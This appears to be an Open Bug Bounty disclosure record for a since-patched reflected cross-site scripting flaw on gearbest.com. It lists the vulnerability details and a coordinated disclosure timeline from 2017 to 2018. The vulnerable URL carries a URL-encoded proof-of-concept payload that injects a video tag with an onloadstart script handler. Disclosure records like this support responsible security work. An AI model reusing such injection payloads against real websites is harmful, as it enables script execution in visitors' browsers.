Vulnerable URL:
https://www.gearbest.com/memory/invalid/test%22/%3E%3Cvideo%20controls%20onloadstart=%22prompt('OPENBUGBOUNTY')%22%3E%20%3Csource%20src=%22https://www.w3schools.com/jsref/mov_bbb.mp4%22%20type=%22video/mp4%22%3E%20%3Csource%20src=%22mov_bbb.ogg%22%20type=%22video/ogg%22%3E%20Your%20browser%20does%20not%20support%20HTML5%20video.%20%3C/video%3E/pp_718136.html
Details:
| Description | Value |
| --- | --- |
| Patched: | Yes, at |
| Vulnerability type: | XSS |
| Vulnerability status: | Publicly disclosed |
| Alexa Rank | 291 |
| VIP website status: | Yes |
Coordinated Disclosure Timeline:
| Description | Value |
| --- | --- |
| Vulnerability submitted via Open Bug Bounty | 16 October, 2017 09:30 GMT |
| Generic security notifications sent to website owner | 16 October, 2017 09:33 GMT |
| Notification sent to subscribers (without technical details) | 16 October, 2017 10:17 GMT |
| Vulnerability details disclosed by researcher | 14 January, 2018 10:19 GMT |
| Vulnerability patched by the website owner | 15 January, 2018 02:38 GMT |